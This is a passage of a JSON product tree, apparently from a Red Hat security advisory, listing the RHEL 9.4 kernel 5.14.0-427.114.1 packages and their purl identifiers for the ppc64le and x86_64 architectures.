"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"product_id": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bpftool-debuginfo@7.3.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-ppc64le@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"product_id": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bpftool@7.3.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "perf-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "perf-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "perf-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rv-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "rv-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "rv-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"product": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"product_id": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bpftool-debuginfo@7.3.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-x86_64@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"product": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"product_id": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bpftool@7.3.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-uki-virt@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-core@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-core@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-kvm@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-kvm@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@5.14.0-427.114.1.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"product": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"product_id": "libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@5.14.0-427.114.1.el9_4?arch=x86_64"
}
